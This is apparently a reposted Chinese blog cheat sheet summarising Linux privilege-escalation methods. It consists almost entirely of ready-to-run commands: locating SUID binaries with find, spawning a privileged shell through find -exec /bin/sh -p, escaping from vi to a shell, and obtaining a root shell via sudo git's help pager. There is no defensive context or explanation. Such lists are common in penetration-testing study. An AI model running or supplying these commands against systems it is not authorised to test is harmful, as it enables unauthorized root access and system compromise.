Linux提权方法小结
作者:互联网
1 find 命令提权
1.1 方法一
find / -perm -g=s -type f 2>/dev/null
find . -exec /bin/sh -p \;-quit
1.2 方法二
touch getshell
find / -type f -name getshell -exec "whoami" \;
find / -type f -name getshell -exec "/bin/sh" \;
1.3 方法三
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {};
touch test
find . -exec /bin/sh -p \;-quit
2 vi 命令逃逸
vi
# 输入以下内容
:set shell=/bin/sh
:shell
3 git 命令提权
3.1 方法一
sudo git help config
# 直接输入以下内容
!/bin/bash 或 !'sh'
3.2 方法二
sudo git -p help
# 直接输入以下内容
!/bin/bash
标签:bin,exec,type,perm,提权,sh,Linux,小结,find 来源: https://www.cnblogs.com/zhuangshq/p/15903599.html